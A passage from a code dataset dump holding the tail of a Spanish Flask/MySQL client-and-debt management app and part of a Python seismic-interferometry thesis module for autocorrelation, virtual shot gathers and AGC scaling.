empleados:\n empleado_dict = {\n 'idcliente': empleado[0],\n 'dni': empleado[1],\n 'apellido': empleado[2],\n 'nombre': empleado[3],\n 'direccion': empleado[4],\n 'telefono': empleado[5],\n 'estado': empleado[6],\n 'observaciones': empleado[7],\n 'fechaAlta': empleado[8],\n 'servicio': empleado[10],\n 'zona': empleado[10]\n }\n empleados_dict.append(empleado_dict)\n return jsonify(empleados_dict)\n\n@app.route(\"/guardarCliente\", methods=[\"POST\"])\ndef guardar():\n data = request.get_json()\n dni = data.get(\"dni\")\n apellido = data.get(\"apellido\")\n nombre = data.get(\"nombre\")\n direccion = data.get(\"direccion\")\n telefono = data.get(\"telefono\")\n estado = data.get(\"estado\")\n observaciones = data.get(\"observaciones\")\n idServicio = data.get(\"idServicio\")\n idZona = data.get(\"zona\")\n sql = \"INSERT INTO cliente (DNI, apellido, nombre, direccion, telefono, estado, observaciones, FechaAlta, idServicio, idZona) VALUES (%s, %s, %s, %s, %s, %s, %s, CURDATE(), %s, %s);\"\n values = (dni, apellido, nombre, direccion, telefono, estado, observaciones, idServicio, idZona)\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, values)\n conn.commit()\n\n return \"Cliente guardado exitosamente\"\n\n\n@app.route(\"/editarCliente/<int:idCliente>\", methods=[\"PUT\"])\ndef editar_cliente(idCliente):\n data = request.get_json()\n dni = data.get(\"dni\")\n apellido = data.get(\"apellido\")\n nombre = 
data.get(\"nombre\")\n direccion = data.get(\"direccion\")\n telefono = data.get(\"telefono\")\n observaciones = data.get(\"observaciones\")\n idServicio = data.get(\"idServicio\")\n idZona = data.get(\"zona\")\n\n sql = \"UPDATE cliente SET dni = %s, apellido = %s, nombre = %s, direccion = %s, telefono = %s, observaciones = %s, idServicio = %s, idZona = %s WHERE idCliente = %s\"\n values = (dni, apellido, nombre, direccion, telefono, observaciones, idServicio, idZona, idCliente)\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, values)\n conn.commit()\n\n return \"Cliente actualizado exitosamente\"\n\n\n@app.route(\"/actualizarEstado/<int:idCliente>\", methods=[\"PUT\"])\ndef editarEstado(idCliente):\n data = request.get_json()\n estado = data.get(\"estado\")\n\n sql = \"UPDATE cliente SET estado = %s WHERE idCliente = %s\"\n values = (estado, idCliente)\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, values)\n conn.commit()\n\n return \"Cliente actualizado exitosamente\"\n\n@app.route('/generarDeuda', methods=['POST'])\ndef generar_deuda():\n # Realizar la llamada al procedimiento almacenado\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('GenerarDeuda')\n conn.commit()\n conn.close()\n return jsonify({'message': 'Deuda generada exitosamente'})\n\n\n@app.route('/clienteDeuda/<int:idCliente>', methods=['GET'])\ndef obtener_deuda_cliente(idCliente):\n sql = \"SELECT c.idcliente, d.iddeuda, monto, d.mes FROM clientedeuda c INNER JOIN deuda d ON c.iddeuda = d.iddeuda WHERE c.idcliente = %s\"\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, (idCliente,))\n clientes_deuda = cursor.fetchall()\n conn.commit()\n\n clientes_dict = []\n for cliente_deuda in clientes_deuda:\n cliente_dict = {\n 'idcliente': cliente_deuda[0],\n 'iddeuda': cliente_deuda[1],\n 'monto': cliente_deuda[2],\n 'mes': cliente_deuda[3]\n }\n clientes_dict.append(cliente_dict)\n\n return jsonify(clientes_dict)\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"JuanCruz2693/ProyectoFinal","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27853435484","text":"import glob\r\nimport os\r\nimport numpy as np\r\nimport obspy\r\nfrom os.path import join\r\nfrom scipy.signal import convolve2d\r\nfrom thesis_functions.util import cross_corr, stream_to_array\r\nfrom thesis_functions.coord import Coords, correct_slowness\r\nfrom thesis_functions.filt import apply_filters\r\n\r\ndef extract_results(path, master_trace, component, path_info, added_string=''):\r\n \"\"\"\r\n Extract the results of the illumination analysis from the output .txt files.\r\n \r\n\r\n Parameters\r\n ----------\r\n path : str\r\n Path to the .txt files.\r\n master_trace : str\r\n Station number of the station used as master station for the \r\n illumination analysis.\r\n component : str\r\n Which component is used for the illumination analysis.\r\n added_string : str, optional\r\n Possible added string for the illumination analysis. Used for the \r\n second filter as ' - filtered'. The default is ''.\r\n\r\n Returns\r\n -------\r\n start_time : np.ndarray\r\n Array with start times of each noise panel. Can be interpreted by\r\n obspy.core.UTCDateTime()\r\n end_time : np.ndarray\r\n Array with the end times of each noise panel. 
Can be interpreted by \r\n obspy.core.UTCDateTime()\r\n dom_slow0 : np.ndarray\r\n Array containing the dominant slowness found for each panel along line\r\n 0.\r\n dom_slow1 : np.ndarray\r\n Array containing the dominant slowness found for each panel along line\r\n 1.\r\n\r\n \"\"\"\r\n \r\n # Get a list of all of the output files\r\n output_files = glob.glob(join(path,f\"Log day * - master {master_trace}{component}{added_string}.txt\"))\r\n \r\n # Initiate lists for all of the relevant information\r\n start_time = []\r\n end_time = []\r\n dom_slow0 = []\r\n dom_slow1 = []\r\n \r\n # Go over each file\r\n for output_file in output_files:\r\n # Get all of the lines from th file\r\n file = open(output_file, 'r')\r\n lines = file.readlines()[1:]\r\n file.close()\r\n \r\n # If there is only a header in the file, a string is returned,\r\n # in that case there were no results for the day, so continue\r\n if isinstance(lines,str):\r\n continue\r\n \r\n # Now go over the lines and extract the relevant information\r\n for line in lines:\r\n start, end, master, slow0, slow1 = line.split(',')\r\n start_time.append(start)\r\n end_time.append(end)\r\n dom_slow0.append(slow0)\r\n dom_slow1.append(slow1)\r\n \r\n # Convert the lists to arrays\r\n start_time = np.array(start_time)\r\n end_time = np.array(end_time)\r\n dom_slow0 = np.array(dom_slow0, dtype=float)\r\n dom_slow1 = np.array(dom_slow1, dtype=float)\r\n \r\n # Correct for the angle between the lines\r\n dom_slow = correct_slowness(dom_slow0, dom_slow1, path_info)\r\n # And separate the output again\r\n dom_slow0, dom_slow1 = dom_slow[:,0], dom_slow[:,1]\r\n \r\n return start_time, end_time, dom_slow0, dom_slow1\r\n\r\ndef convert_date(times, method):\r\n \"\"\"\r\n Convert the date format from the string given from the illumination analysis\r\n to different date objects. Options are:\r\n plt:\r\n Matplotlib date\r\n obspy:\r\n Obspy UTCDateTime object\r\n\r\n Parameters\r\n ----------\r\n times : np.ndarray\r\n Array containing the date strings to be converted.\r\n method : str\r\n String indicating the format to convert to. Can be 'plt' for \r\n matplotlib or 'obspy' for a UTCDateTime object.\r\n\r\n Returns\r\n -------\r\n np.ndarray\r\n Array containing the times in the new form.\r\n\r\n \"\"\"\r\n new_times = []\r\n for time in times:\r\n if method == 'plt':\r\n new_times.append(obspy.UTCDateTime(time).matplotlib_date)\r\n elif method == 'obspy':\r\n new_times.append(obspy.UTCDateTime(time))\r\n return np.array(new_times)\r\n\r\ndef select_panels(dom_slow0, dom_slow1, vel_cut, method = 'per_line'):\r\n \"\"\"\r\n Gives a mask to select all panels where the dominant slowness for both\r\n lines is lower than the reciprocal of a selected velocity.\r\n\r\n Parameters\r\n ----------\r\n dom_slow0 : np.ndarray\r\n Array containing the dominant slownesses for line 0. 
It is assumed to\r\n have the same shape and ordering as dom_slow1\r\n dom_slow1 : np.ndarray\r\n Similar to dom_slow0, but for line 1.\r\n vel_cut : float\r\n Dominant slownesses are tested to be below 1/vel_cut.\r\n\r\n Returns\r\n -------\r\n np.ndarray\r\n Returns mask (array with booleans) for the locations where the conditions\r\n are met.\r\n\r\n \"\"\"\r\n \r\n if method == 'per_line':\r\n # Test for both lines\r\n test0 = abs(dom_slow0) <= 1/vel_cut\r\n test1 = abs(dom_slow1) <= 1/vel_cut\r\n # And give back the places where both are selected.\r\n return np.logical_and(test0, test1)\r\n elif method == 'length':\r\n veclen = np.linalg.norm([dom_slow0,dom_slow1],axis=0)\r\n \r\n return veclen <= 1/vel_cut\r\n\r\ndef date_from_filename(filename):\r\n \"\"\"\r\n Gives an obspy UTCDateTime object from the filename of an output file.\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n The string containing the filename that was output from the illumination\r\n analysis.\r\n\r\n Returns\r\n -------\r\n obspy UTCDateTime\r\n The time contained in the filname as UTCDateTime object.\r\n\r\n \"\"\"\r\n return obspy.core.UTCDateTime(\"%s-%s-%sT%s:%s:%s\"%tuple(filename.split('.')[:-2]))\r\n\r\ndef times_mask(times, filename, chunk_len=30*60):\r\n \"\"\"\r\n When given the filename of a chunk of data, this function provides a mask\r\n for times that indicates which timestamps are represented in the data file\r\n\r\n Parameters\r\n ----------\r\n times : np.ndarray\r\n Array containing the time stamps.\r\n filename : str\r\n Name of the data file.\r\n chunk_len : float, optional\r\n Length of each data file in seconds. The default is 30*60.\r\n\r\n Returns\r\n -------\r\n mask : np.ndarray\r\n Boolean array that indicates which times in times are included in the\r\n timeframe of the data file.\r\n\r\n \"\"\"\r\n # Find the start and end times of the chunk\r\n start_chunk = date_from_filename(filename)\r\n end_chunk = start_chunk + chunk_len\r\n \r\n # Select the times that fit in this chunk\r\n mask = np.logical_and(times >= start_chunk, times < end_chunk)\r\n return mask\r\n\r\ndef find_times_in_chunk(times, filename, chunk_len = 30*60):\r\n \"\"\"\r\n Given a filename and a list of times, finds the times contained in that \r\n file and returns them. \r\n\r\n Parameters\r\n ----------\r\n times : np.ndarray\r\n Array with times as obspy UTCDateTime object or matplotlib date.\r\n filename : str\r\n The filename of the data chunk that is analysed.\r\n chunk_len : float, optional\r\n The length of the chunk in seconds. Default is the default value from\r\n the illumination analysis.\r\n \r\n Returns\r\n -------\r\n np.ndarray\r\n Array with times as the same type as the input, sliced to only contain\r\n times fitting in the chunk.\r\n\r\n \"\"\"\r\n mask = times_mask(times, filename, chunk_len)\r\n return times[mask]\r\n\r\ndef get_panel(record, times, window_length = 10.):\r\n \"\"\"\r\n Generator function that gives each selected time panel in a time section.\r\n Length of the panel can be adjusted.\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n A stream object containing the data.\r\n times : np.ndarray\r\n Array containing the times as obspy UTCDateTime objects that should be \r\n cut from the data. The time is the start of the new panel.\r\n window_length : float, optional\r\n Length of the panels that are cut from the data. 
The default is 10.\r\n\r\n Yields\r\n ------\r\n obspy Stream\r\n New stream object cut to the desired time and length.\r\n\r\n \"\"\"\r\n for time in times:\r\n yield record.slice(time, time+window_length)\r\n\r\ndef autocorr_panel(record):\r\n \"\"\"\r\n Autocorrelate all of the traces in a section. Only positive times are taken\r\n from the correlation, so that t0 from the autocorrelation is at the original\r\n start time of the section.\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n Original section.\r\n\r\n Returns\r\n -------\r\n record_corr : obspy Stream\r\n Autocorrelated section.\r\n\r\n \"\"\"\r\n # Create a new stream\r\n record_corr = obspy.Stream()\r\n \r\n # Go over all of the traces\r\n for trace in record:\r\n # Correlate the trace with itself\r\n trace_corr = cross_corr(trace, trace)\r\n \r\n # Only take positive times\r\n trace_corr.data = trace_corr.data[int((trace_corr.stats.npts - 1) / 2):]\r\n \r\n # Add it to the stream\r\n record_corr += trace_corr\r\n \r\n return record_corr\r\n\r\ndef recreate_stream(section, record, line, dist_tr, path_info):\r\n \"\"\"\r\n Recreate a stream after autocorrelating data. Copies different characteristics\r\n over from original Stream\r\n\r\n Parameters\r\n ----------\r\n section : np.ndarray\r\n Array containing the autocorrelated data.\r\n record : obspy Stream\r\n The stream to copy the information from.\r\n line : str\r\n Which line is being processed.\r\n path_info : str or path\r\n Path to the coordinate information.\r\n\r\n Returns\r\n -------\r\n section_stream : obspy Stream\r\n .\r\n\r\n \"\"\"\r\n # Set up coordinate information\r\n crd = Coords(path_info)\r\n \r\n # Select the right line for the data\r\n rec = crd.line_stream(record)\r\n # rec = select_line(record, line, path_info)\r\n \r\n # Create a new stream\r\n section_stream = obspy.Stream()\r\n \r\n # Go over each trace\r\n for i in range(section.shape[0]):\r\n # Create a new trace\r\n trace = obspy.Trace()\r\n # Add the data and extra information\r\n trace.data = section[i,:]\r\n trace.stats.station = rec[i].stats.station\r\n trace.stats.sampling_rate = rec[i].stats.sampling_rate\r\n trace.stats.starttime = rec[i].stats.starttime\r\n trace.stats.channel = rec[i].stats.channel\r\n \r\n # Add the trace to the stream\r\n section_stream += trace\r\n \r\n section_stream = crd.attach_distances(section_stream, line, mtr_idx = dist_tr)\r\n # section_stream = attach_distances(section_stream, dist_tr, line, path_info)\r\n return section_stream\r\n\r\ndef recreate_stream_NMO(new_data,record):\r\n \"\"\"\r\n An adapted version of recreate stream for NMO corrected CMP gathers. \r\n\r\n Parameters\r\n ----------\r\n new_data : np.ndarray\r\n Array containing the new data that should be fit in a stream.\r\n record : obspy.core.stream.Stream\r\n Stream which serves as the example. 
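The NMO\r\n correction is assumed to have been applied to new_data already; this\r\n only repackages the samples into traces. 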
Most data is copied over\r\n\r\n Returns\r\n -------\r\n record_shift : obspy.core.stream.Stream\r\n A stream containing the data of new_data.\r\n\r\n \"\"\"\r\n # XXX Can probably be merged with recreate_stream\r\n record_shift = obspy.Stream()\r\n \r\n # Go over each trace\r\n for i in range(new_data.shape[1]):\r\n # Create a new trace\r\n trace = obspy.Trace()\r\n # Add the data and extra information\r\n trace.data = new_data[:,i]\r\n trace.stats.station = record[i].stats.station\r\n trace.stats.sampling_rate = record[i].stats.sampling_rate\r\n trace.stats.starttime = record[i].stats.starttime\r\n trace.stats.channel = record[i].stats.channel\r\n trace.stats.distance = record[i].stats.distance\r\n \r\n # Add the trace to the stream\r\n record_shift += trace\r\n \r\n return record_shift\r\n\r\ndef normalise_section(record):\r\n \"\"\"\r\n Normalise each trace in a section by dividing each trace by its root-mean-\r\n square value. Traces with no data are left as is\r\n\r\n Parameters\r\n ----------\r\n record : obspy.core.stream.Stream\r\n Record that must be normalised.\r\n\r\n Returns\r\n -------\r\n new_record : obspy.core.stream.Stream\r\n Normalised record.\r\n\r\n \"\"\"\r\n \r\n # Initialise a new record\r\n new_record = record.copy()\r\n \r\n data = stream_to_array(new_record)\r\n \r\n # Calculate the rms of the trace. A trace with no data is just divided by 1\r\n squares = np.square(data)\r\n mean_squares = np.mean(squares, axis=1)\r\n mean_squares[mean_squares == 0] = 1.\r\n root_mean_squares = np.sqrt(mean_squares)\r\n \r\n # Divide each trace by its rms\r\n new_data = data / root_mean_squares[:,np.newaxis]\r\n \r\n # Add the new data to the stream\r\n for i,trace in enumerate(new_record):\r\n trace.data = new_data[i,:]\r\n return new_record\r\n\r\ndef normalise_trace(trace):\r\n \"\"\"\r\n Normalise a single trace by dividing it by its root-mean-square value. A\r\n trace with no data is not changed.\r\n\r\n Parameters\r\n ----------\r\n trace : obspy.core.trace.Trace\r\n Trace that must be normalised.\r\n\r\n Returns\r\n -------\r\n obspy.core.trace.Trace\r\n Normalised trace.\r\n\r\n \"\"\"\r\n # Create a new trace\r\n new_trace = obspy.Trace()\r\n\r\n # If all of the data are zeroes, just return the original to prevent\r\n # a divide by zero\r\n if np.all(trace.data == 0.):\r\n return trace\r\n \r\n # Calculate the rms of the trace\r\n squares = np.square(trace.data)\r\n mean_squares = np.mean(squares)\r\n if mean_squares == 0.:\r\n # If the trace contains no data, the trace itself is returned\r\n return trace\r\n root_mean_squares = np.sqrt(mean_squares)\r\n \r\n # Divide the data by the rms\r\n new_trace.data = trace.data / root_mean_squares\r\n new_trace.stats = trace.stats\r\n return new_trace\r\n\r\ndef autocorr_section(path_base, \r\n path_saved, \r\n path_info, \r\n mtr_station, \r\n component, \r\n window_length, \r\n vel_cut, \r\n added_string = '', \r\n print_progress=True, \r\n sel_method = 'per_line'):\r\n \"\"\"\r\n Function that handles generating an autocorrelated section from the results\r\n of illumination analysis. 
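Selected noise panels are filtered,\r\n trace-normalised, autocorrelated and stacked into one section per line.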
\r\n\r\n Parameters\r\n ----------\r\n path_base : str or path\r\n Path to the location of the raw data.\r\n path_saved : str or path\r\n Path to the results of the illumination analysis.\r\n path_info : str or path\r\n Path to coordinate information, see thesis_function.coord.read_coords\r\n mtr_station : str\r\n The station number of the master trace used for the illumination analysis.\r\n component : str\r\n Component for which the section is generated.\r\n window_length : float\r\n Window length used for the panels of the autocorrelation.\r\n vel_cut : float\r\n Minimum dominant velocity to use to select the panels.\r\n print_progress : bool, optional\r\n Whether or not to print the progress of calculations. The default is True.\r\n\r\n Returns\r\n -------\r\n section0 : Stream\r\n Stream containing the autocorrelations for line 0.\r\n section1 : Stream\r\n Stream containing the autocorrelations for line 1.\r\n\r\n \"\"\"\r\n # Get the results from the illumination analysis\r\n start_time, __, dom_slow0, dom_slow1 = extract_results(path_saved, mtr_station, component, path_info, added_string)\r\n \r\n # Select the times when the events come in roughly vertical\r\n mask = select_panels(dom_slow0, dom_slow1, vel_cut, method=sel_method)\r\n \r\n times_sel = start_time[mask]\r\n \r\n # Set up coordinate info\r\n crd = Coords(path_info)\r\n \r\n # Convert the times to obspy UTCDateTime objects and open the line numbers\r\n times_sel = convert_date(times_sel, 'obspy')\r\n line_id = crd.line_id\r\n \r\n # Now go over all files with raw data\r\n folder_list = glob.glob(os.path.join(path_base,'*'))\r\n \r\n # Read one file to get some information\r\n record = obspy.read(glob.glob(os.path.join(path_base,'*','*.mseed'))[0])\r\n # Initialise the autocorrelated sections\r\n section_l0 = np.zeros([np.sum(line_id == 0.), int(window_length*record[0].stats.sampling_rate + 1)])\r\n section_l1 = np.zeros([np.sum(line_id == 1.), int(window_length*record[0].stats.sampling_rate + 1)])\r\n \r\n # Go over all of the folders\r\n for i,folder in enumerate(folder_list):\r\n # See all the files in this folder\r\n file_list = glob.glob(os.path.join(folder,f'*.{component}.mseed'))\r\n \r\n # Go over all of the files\r\n for j,file in enumerate(file_list):\r\n # See which of the selected times fits in this chunk\r\n times_chunk = find_times_in_chunk(times_sel,os.path.split(file)[-1])\r\n \r\n if print_progress:\r\n print(f'\\r{i}/{len(folder_list)}\\t[{j}/{len(file_list)}]\\tOpening file... 
', end='')\r\n \r\n # If there are not times selected, skip this file\r\n if len(times_chunk) == 0:\r\n continue\r\n \r\n # Otherwise read in the file\r\n record = obspy.read(file)\r\n \r\n # Go over all of the panels in the file\r\n for k,panel in enumerate(get_panel(record, times_chunk)):\r\n if print_progress:\r\n print(f'\\r{i}/{len(folder_list)}\\t[{j}/{len(file_list)}]\\t[{k}/{len(times_chunk)}]\\tAdding panels...', end='')\r\n \r\n # Filter the data\r\n panel = apply_filters(panel)\r\n \r\n # Normalise each trace against itself\r\n panel = normalise_section(panel)\r\n \r\n # Autocorrelate it\r\n auto_corr = autocorr_panel(panel)\r\n \r\n # And add the data of this panel to the total\r\n section_l0 += stream_to_array(crd.line_stream(auto_corr, 0))\r\n section_l1 += stream_to_array(crd.line_stream(auto_corr, 1))\r\n # section_l0 += np.array(select_line(auto_corr, '0', path_info))\r\n # section_l1 += np.array(select_line(auto_corr, '1', path_info))\r\n \r\n if print_progress:\r\n print(f'\\r{i+1}/{len(folder_list)}\\t[{j+1}/{len(file_list)}]\\t\\t\\t\\t', end = '')\r\n \r\n # In the end, add all of the other data to create a stream\r\n section0 = recreate_stream(section_l0, record, '0', 27, path_info)\r\n section1 = recreate_stream(section_l1, record, '1', 36, path_info)\r\n \r\n return section0, section1\r\n\r\ndef flip_shot(virt_rec,dom_slow):\r\n \"\"\"\r\n Function applying the TRBI principle as described in the main text of the\r\n thesis. Depending on the direction that the main event in each panel \r\n arrived from, the causal or acausal part of the crosscorrelation is taken. \r\n For panels characterised with a positive slowness, the receiver locations\r\n that have a positive distance (higher along the line) use the causal part.\r\n Vice versa, the receiver locations with a negative distance use the time-\r\n reversed acausal part. This is flipped for negative slowness.\r\n\r\n Parameters\r\n ----------\r\n virt_rec : obspy.stream.Stream\r\n The crosscorrelated panel with the distance to the virtual shot \r\n location attached as trace.stats.distance. Distances upslope should be\r\n higher.\r\n dom_slow : float\r\n The dominant slowness of the panel.\r\n\r\n Returns\r\n -------\r\n data : np.ndarray\r\n The crosscorrelated panel with TRBI applied. Should look like the \r\n causal part of a crosscorrelation\r\n\r\n \"\"\"\r\n # Initialise arrays for the new data and the distances\r\n data = np.zeros([len(virt_rec), int((virt_rec[0].stats.npts-1)/2+1)])\r\n dists = np.zeros(len(virt_rec))\r\n \r\n # Determine the sign of the slowness\r\n direction = dom_slow/abs(dom_slow)\r\n \r\n # Get the distance to the virtual shot location for each receiver\r\n for i,trace in enumerate(virt_rec):\r\n dists[i] = trace.stats.distance\r\n \r\n raw_data = stream_to_array(virt_rec)\r\n # Now take the causal or time-reversed acausal part depending on the sign\r\n # of the slowness and the relative position of the receiver to the virtual\r\n # shot location\r\n data[dists*direction>=0.,:] = raw_data[dists*direction>=0.,int((virt_rec[0].stats.npts-1)/2):]\r\n data[dists*direction<0.,:] = raw_data[dists*direction<0.,:int((virt_rec[0].stats.npts-1)/2+1)][:,::-1]\r\n \r\n return data\r\n\r\ndef convert_shotdata(virt_shots,record,line,path_info):\r\n \"\"\"\r\n Convert raw virtual shot gathers to streams so that they can be \r\n manipulated/saved. 
The information for the stream comes from record.\r\n\r\n Parameters\r\n ----------\r\n virt_shots : list\r\n List containing all np.ndarrays with the raw virtual shot data.\r\n record : obspy.core.stream.Stream\r\n Stream containing the relevant information for each virtual shot stream\r\n line : str\r\n Identifier for the line of the virtual shot gather.\r\n path_info : str\r\n Path to coordinate information.\r\n\r\n Returns\r\n -------\r\n streams : list\r\n List containing a stream for every virtual shot gather provided.\r\n\r\n \"\"\"\r\n streams = []\r\n \r\n # Go over each virtual shot location\r\n for i in range(len(virt_shots)):\r\n # and use recreate_stream to get the streams back\r\n streams.append(recreate_stream(virt_shots[i,...],record,line,i,path_info))\r\n return streams\r\n\r\ndef save_shotdata(path_save,shots,line,min_vel):\r\n \"\"\"\r\n Function that saves virtual shot gathers as streams as .mseed files.\r\n\r\n Parameters\r\n ----------\r\n path_save : str\r\n The location to save each virtual shot gather to. A subfolder for the\r\n specific line is created if it not already exists\r\n shots : list\r\n List containing the streams that must be saved.\r\n line : str\r\n The line on which the virtual shot gathers are located.\r\n min_vel : float\r\n The minimum velocity used to select panels for the virtual shot gathers\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n # Create the path where the .mseed files are saved\r\n new_path = os.path.join(path_save,'Crosscorr '+str(int(min_vel)),line)\r\n\r\n # If this folder does not exist yet, create a folder\r\n if not os.path.isdir(os.path.dirname(new_path)):\r\n os.mkdir(os.path.dirname(new_path))\r\n\r\n # Go over each stream\r\n for i,stream in enumerate(shots):\r\n # Generate a filename for the stream\r\n filename = f'Line {line} - shot {stream[i].stats.station[1:]}.mseed'\r\n \r\n try:\r\n # Write the stream to a file\r\n stream.write(os.path.join(new_path,filename))\r\n except FileNotFoundError:\r\n # XXX For some reason, repeat making the folder if the writing fails\r\n os.mkdir(new_path)\r\n stream.write(os.path.join(new_path,filename))\r\n\r\ndef crosscorr_section(path_base,path_saved,path_info,mtr_station,component,window_length,vel_cut,print_progress=True, return_stream=None, method='per_line'):\r\n \"\"\"\r\n A function that creates virtual shot gathers from selected noise panels.\r\n Because the function is too slow, it was parallelised, for that we refer\r\n to the file mp_crosscorr.py.\r\n\r\n Parameters\r\n ----------\r\n path_base : str\r\n Path to the raw data.\r\n path_saved : str\r\n Path to the results of the illumination analysis.\r\n path_info : str\r\n Path to the coordinate information.\r\n mtr_station : str\r\n Station number of station used as master trace in the illumination \r\n analysis.\r\n component : str\r\n Component used for the illumination analysis.\r\n window_length : float\r\n Window length of the noise panels.\r\n vel_cut : float\r\n Minimum apparent velocity used to select noise panels.\r\n print_progress : float, optional\r\n Whether or not to print the progress of the function. \r\n The default is True.\r\n return_stream : str, optional\r\n Which virtual shot gathers to return. Can be the line identifiers ('0' \r\n or '1') or 'all'. All information is always saved. 
The default is None.\r\n\r\n Returns\r\n -------\r\n results : list\r\n A list containing a stream for every virtual shot location.\r\n\r\n \"\"\"\r\n # Extract the results of the illumination analysis\r\n start_time, __, dom_slow0, dom_slow1 = extract_results(path_saved, mtr_station, component, path_info)\r\n \r\n # Select only the panels with the right slowness\r\n mask = select_panels(dom_slow0, dom_slow1, vel_cut, method=method)\r\n \r\n # Set up coordinate info\r\n crd = Coords(path_info)\r\n \r\n times_sel = convert_date(start_time[mask],'obspy')\r\n dom_slow = np.stack([dom_slow0, dom_slow1]).swapaxes(0,1)\r\n dom_slow_sel = dom_slow[mask,:]\r\n \r\n # Get the line identifiers of each station\r\n line_id = crd.line_id\r\n # line_id = open_line_id(path_info)\r\n \r\n # Read one file to get some information\r\n record = obspy.read(glob.glob(os.path.join(path_base,'*','*.mseed'))[0])\r\n \r\n # Initiate arrays for every virtual shot gather and each line\r\n virt_shots = [np.zeros([np.sum(line_id==0),np.sum(line_id==0),int(record[0].stats.sampling_rate*window_length+1)]),\r\n np.zeros([np.sum(line_id==1),np.sum(line_id==1),int(record[0].stats.sampling_rate*window_length+1)])]\r\n \r\n # Get every data folder of the raw data\r\n folder_list = glob.glob(os.path.join(path_base,'*'))\r\n \r\n if print_progress:\r\n # Initialise the progress counter\r\n counter = 0\r\n print(f\"Progress:\\n0/{len(times_sel)}\\t0/{len(line_id)}\",end='')\r\n \r\n # Now go through each folder\r\n for folder in folder_list:\r\n \r\n # And each data file in the folder\r\n file_list = glob.glob(os.path.join(folder,f'*.{component}.mseed'))\r\n for file in file_list:\r\n \r\n # Now get the start time of each selected panel that falls within\r\n # this file\r\n mask_chunk = times_mask(times_sel,os.path.split(file)[-1])\r\n # Get the slowness of each panel in this file\r\n slows = dom_slow_sel[mask_chunk,:]\r\n times_chunk = times_sel[mask_chunk]\r\n \r\n # If there are no times selected, skip this file\r\n if len(times_chunk) == 0:\r\n continue\r\n \r\n # Now read the file\r\n record = obspy.read(file)\r\n # And attach the line identifiers to the record\r\n record = crd.attach_coords(record)\r\n # record = attach_line(record,path_info)\r\n \r\n # Go over each panel in the file\r\n for i,panel in enumerate(get_panel(record,times_chunk,window_length)):\r\n \r\n # Normalise the panel\r\n panel = normalise_section(panel)\r\n \r\n # Now take every receiver location and use it as a master trace\r\n # to get virtual shot locations\r\n for j,master_trace in enumerate(panel):\r\n \r\n # Find on which line this location lies\r\n line = master_trace.stats.location\r\n # And the name of the master trace station\r\n mtr_stat = master_trace.stats.station\r\n \r\n # Take only the traces that belong to the same line\r\n panel_sel = crd.line_stream(panel,line)\r\n # panel_sel = select_line(panel,line,path_info)\r\n \r\n # Find the index of the master trace\r\n for idx,trace in enumerate(panel_sel):\r\n if trace.stats.station == mtr_stat:\r\n new_j = idx\r\n break\r\n \r\n # Croscorrelate each trace in the panel with the master \r\n # trace\r\n record_corr = obspy.Stream()\r\n for trace in panel_sel:\r\n trace_corr = cross_corr(master_trace, trace)\r\n record_corr += trace_corr\r\n \r\n # Attach the distance to the virtual shot location to each\r\n # trace\r\n record_corr = crd.attach_distances(record_corr, line, mtr_idx = new_j)\r\n # record_corr = attach_distances(record_corr, new_j, line, path_info)\r\n \r\n # Now apply TRBI by 
taking the time-reversed acausal part \r\n                    # or the causal part on each side of the virtual shot \r\n                    # location depending on the sign of the slowness\r\n                    add_line = flip_shot(record_corr,slows[i,int(line)])\r\n                    \r\n                    # Now add the result to the stack for this virtual shot\r\n                    # location\r\n                    virt_shots[int(line)][new_j,:,:] += np.array(add_line)\r\n                    \r\n                    if print_progress:\r\n                        print(f\"\\r{counter}/{len(times_sel)}\\t{j}/{len(record)}        \",end='')\r\n            \r\n                if print_progress:\r\n                    counter += 1\r\n                    print(f\"\\r{counter+1}/{len(times_sel)}\\t{j+1}/{len(record)}        \",end='')\r\n    \r\n    if print_progress:\r\n        print(\"Saving...\")\r\n    \r\n    if return_stream == 'all':\r\n        results = []\r\n    \r\n    # Now go over each line and save each virtual shot gather as an .mseed file\r\n    lines = crd.lines\r\n    # lines = get_unique_lines(path_info)\r\n    for line in lines:\r\n        \r\n        # First convert the virtual shot data to a stream\r\n        streams = convert_shotdata(virt_shots[int(line)], record, line, path_info)\r\n        # Then save the virtual shot streams as .mseed files\r\n        save_shotdata(path_saved,streams,line,vel_cut)\r\n        \r\n        if return_stream == line:\r\n            results = streams\r\n        elif return_stream == 'all':\r\n            results.append(streams)\r\n        \r\n        print(f'\\rSaved line {line}', end='')\r\n    return results\r\n    \r\n\r\ndef AGC_scaling_val(window, type_scal):\r\n    \"\"\"\r\n    Return the value with which to scale the data for AGC, see the function\r\n    AGC for more information. This function calculates a separate value for each\r\n    trace in the stream. Mirrors the SeisSpace ProMax AGC function. Determines\r\n    some kind of average for the data and returns the inverse. There are\r\n    three methods:\r\n        mean:\r\n            Uses the mean of the absolute amplitudes of each trace\r\n        median:\r\n            Uses the median of the absolute amplitudes of each trace\r\n        RMS:\r\n            Uses the rms amplitude of each trace.\r\n\r\n    Parameters\r\n    ----------\r\n    window : obspy Stream\r\n        Stream object that contains the traces.\r\n    type_scal : str\r\n        The type of scaling to use. Can be 'mean', 'median' or 'RMS'\r\n\r\n    Returns\r\n    -------\r\n    float\r\n        Inverse of the selected kind of average to scale the data with.\r\n\r\n    \"\"\"\r\n    # First takes the absolute values of the data\r\n    data = abs(stream_to_array(window))\r\n    \r\n    # Then determine the right kind of average\r\n    if type_scal == 'mean':\r\n        return 1/np.mean(data,axis=1)\r\n    elif type_scal == 'median':\r\n        return 1/np.median(data,axis=1)\r\n    elif type_scal == 'RMS':\r\n        mean_square = np.mean(np.square(data), axis=1)\r\n        return 1/np.sqrt(mean_square)\r\n\r\ndef get_AGC_window(trace, oper_len, basis):\r\n    \"\"\"\r\n    Generator function that gives the window for the AGC function. Streams are\r\n    assumed to all contain 